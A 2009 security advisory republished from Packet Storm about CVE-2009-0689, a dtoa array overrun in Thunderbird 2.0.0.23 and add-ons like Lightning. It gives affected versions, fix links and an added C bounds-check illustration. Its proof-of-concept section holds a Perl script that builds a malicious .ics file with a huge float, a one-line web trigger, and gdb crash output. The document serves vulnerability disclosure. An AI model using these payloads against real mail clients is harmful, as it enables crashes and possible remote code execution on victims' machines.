Thunderbird 2.0.0.23 Remote Array Overrun

Packet Storm (PACKETSTORM:83740), packetstormsecurity.com
Published: 2009-12-12 00:00:00
Author: Maksymilian Arciemowicz

EPSS: 0.97 (High), percentile 99.7%

`[ Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code  
execution) ]  
  
Author: Maksymilian Arciemowicz and sp3x  
http://SecurityReason.com  
Date:  
- Dis.: 07.05.2009  
- Pub.: 11.12.2009  
  
CVE: CVE-2009-0689  
CWE: CWE-119  
Risk: High  
Remote: Yes  
  
Affected Software:  
- Thunderbird 2.0.0.23  
  
Fixed in:  
- Thunderbird 3.0  
- Thunderbird 2.0.0.24pre  
  
NOTE: Prior versions may also be affected.  
  
Original URL:  
http://securityreason.com/achievement_securityalert/78  
  
  
--- 0.Description ---  
Thunderbird 2 includes many new features to help you manage your inbox.  
With Thunderbird 2, it's easier to prioritize and find your important  
email with tags, and the new find bar helps you find content within your  
email faster.  
Lightning brings the Sunbird calendar to the popular email client,  
Mozilla Thunderbird. Since it's an extension, Lightning is tightly  
integrated with Thunderbird, allowing it to easily perform email-related  
calendaring tasks.  
  
  
--- 1. Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code  
execution) ---  
The main problem exists in the dtoa implementation. Thunderbird has the  
same dtoa as Firefox and the other Mozilla products. This problem also  
affects many Add-ons for Thunderbird.  
  
Examples of affected Add-ons:  
- Lightning 0.9  
- Thunderbrowse 3.2.6.7  
- more  
  
and it is the same issue as SREASONRES:20090625:  
  
http://securityreason.com/achievement_securityalert/63  
  
but the fix for SREASONRES:20090625 used by OpenBSD was not sufficient.  
More information about the fix for OpenBSD and similar systems is in  
SREASONRES:20091030:  
  
http://securityreason.com/achievement_securityalert/69  
  
We can create a float with any number of digits, which will overwrite  
memory. Kmax is defined as 15. Functions in dtoa don't check the Kmax  
limit, and it is possible to access elements 16 and above of the  
freelist array.  
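As an added illustration (not code from the advisory, from Mozilla or from the BSD fixes), this is the shape of the bounds check a corrected dtoa allocator needs: the freelist is only indexed when k <= Kmax, and a Bigint whose k exceeds Kmax is released outright instead of being pushed onto a cache slot that does not exist. The struct layout and function names here are simplified assumptions.

```c
#include <stdlib.h>

#define Kmax 15  /* as in dtoa: freelist has Kmax+1 slots, k = 0..15 */

typedef struct Bigint {
    struct Bigint *next;     /* link within the freelist chain */
    int k, maxwds, sign, wds;
    unsigned int x[1];       /* 'maxwds' words actually follow */
} Bigint;

static Bigint *freelist[Kmax + 1];

/* Size class k holds 1<<k words. The unchecked original did
   "rv = freelist[k]" for any k, so k >= 16 read past the array. */
static Bigint *balloc_checked(int k) {
    Bigint *rv;
    if (k <= Kmax && (rv = freelist[k]) != NULL) {
        freelist[k] = rv->next;          /* recycle a cached block */
    } else {
        int x = 1 << k;
        rv = malloc(sizeof(Bigint) + (size_t)(x - 1) * sizeof(unsigned int));
        if (rv == NULL)
            return NULL;
        rv->k = k;
        rv->maxwds = x;
    }
    rv->sign = rv->wds = 0;
    return rv;
}

/* Blocks above Kmax are never cached: without this test the original
   wrote "freelist[v->k] = v" out of bounds, corrupting whatever follows. */
static void bfree_checked(Bigint *v) {
    if (v == NULL)
        return;
    if (v->k > Kmax) {
        free(v);
        return;
    }
    v->next = freelist[v->k];
    freelist[v->k] = v;
}
```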
  
  
--- 2. Proof of Concept (PoC) ---  
  
(PoC for Lightning )  
-----------------------  
#!/usr/bin/perl  
# SecurityReason.com  
# sp3x  
# tested on WinXp SP3  
use strict;  
use warnings;  
  
my $header = "BEGIN:VCALENDAR\n".  
"PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\n".  
"VERSION:2.0\n".  
"BEGIN:VTIMEZONE\n".  
"TZID:Europe/Prague\n".  
"X-LIC-LOCATION:Europe/Prague\n".  
"BEGIN:DAYLIGHT\n".  
"TZOFFSETFROM:+0100\n".  
"TZOFFSETTO:+0200\n".  
"TZNAME:CEST\n".  
"DTSTART:19700329T020000\n".  
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\n".  
"END:DAYLIGHT\n".  
"BEGIN:STANDARD\n".  
"TZOFFSETFROM:+0200\n".  
"TZOFFSETTO:+0100\n".  
"TZNAME:CET\n".  
"DTSTART:19701025T030000\n".  
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\n".  
"END:STANDARD\n".  
"END:VTIMEZONE\n".  
"BEGIN:VEVENT\n".  
"CREATED:20091117T095214Z\n".  
"LAST-MODIFIED:20091117T095217Z\n".  
"DTSTAMP:20091117T095214Z\n".  
"UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\n";  
my $s = "SUMMARY:0.";  
my $expl = "1" x 296450;  
my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T110000\n".  
"DTEND;TZID=Europe/Prague:20100111T120000\n".  
"END:VEVENT\n".  
"END:VCALENDAR\n";  
  
open(my $fh, '>>', 'test.ics') or die "cannot open test.ics: $!";  
print $fh $header.$s.$expl.$footer;  
close($fh);  
-----------------------  
  
(PoC for Thunderbrowse )  
-----------------------  
<script>  
var a=0.<?php echo str_repeat("1",333333); ?>;  
</script>  
-----------------------  
  
When Thunderbrowse is used to view this page, Thunderbird crashes with:  
  
Program terminated with signal 11, Segmentation fault.  
#0 0xbb15d1e7 in ?? ()  
  
eax 0x0 0  
ecx 0xa 10  
edx 0x0 0  
ebx 0xbb16eb38 -1156125896  
esp 0xbfbfce58 0xbfbfce58  
ebp 0xbfbfce74 0xbfbfce74  
esi 0xb 11  
edi 0xb768e700 -1217861888  
eip 0xbb15d1e7 0xbb15d1e7  
eflags 0x282 [ SF IF ]  
cs 0x23 35  
ss 0x2b 43  
ds 0x2b 43  
es 0x2b 43  
fs 0xab 171  
gs 0xb3 179  
  
(gdb) x/x ($eip)  
0xbb15d1e7: Cannot access memory at address 0xbb15d1e7  
(gdb) x/x ($esi)  
0xb: Cannot access memory at address 0xb  
(gdb) x/x ($edi)  
0xb768e700: 0x1c71c71c  
  
esi is now 0xb and edi points at 0x1c71c71c:  
  
(gdb) x/20x ($edi)  
0xb768e700: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c  
0xb768e710: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7  
0xb768e720: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71  
0xb768e730: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c  
0xb768e740: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7  
  
(gdb) x/50x ($edi)+37000  
0xb7697788: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7  
0xb7697798: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71  
0xb76977a8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c  
0xb76977b8: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7  
0xb76977c8: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71  
0xb76977d8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c  
0xb76977e8: 0xc71c71c7 0x91c71c71 0x0b76d741 0x1af63420  
0xb76977f8: 0x7c6568c4 0xd74952a1 0x552d1c87 0x4018081a  
0xb7697808: 0xcb313ca6 0xd16c5484 0x36d13467 0x130c4b7d  
0xb7697818: 0x92c1d06c 0xf70d9591 0x56bea87c 0x7c7bcc44  
0xb7697828: 0xe6dd415d 0x210c53a8 0x482d162b 0x6d39c1c9  
0xb7697838: 0x478f5fb2 0x9d6a2f46 0xe8b20d52 0xb012aa49  
0xb7697848: 0xd75822f6 0x83ebbe5a  
  
  
--- 3. SecurityReason Note ---  
Officially, SREASONRES:20090625 has been detected in:  
- OpenBSD  
- NetBSD  
- FreeBSD  
- MacOSX  
- Google Chrome  
- Mozilla Firefox  
- Mozilla Seamonkey  
- Mozilla Thunderbird  
- Mozilla Sunbird  
- Mozilla Camino  
- KDE (example: konqueror)  
- Opera  
- K-Meleon  
- F-Lock  
  
This list is not yet closed.  
  
  
--- 4. Fix ---  
NetBSD fix (optimal):  
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h  
  
OpenBSD fix:  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c  
  
  
--- 5. Credits ---  
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.  
  
  
--- 6. Greets ---  
Infospec p_e_a pi3  
  
  
--- 7. Contact ---  
Email:  
- cxib {a.t] securityreason [d0t} com  
- sp3x {a.t] securityreason [d0t} com  
  
GPG:  
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
- http://securityreason.com/key/sp3x.gpg  
  
http://securityreason.com/  
http://securityreason.pl/  
  
  
`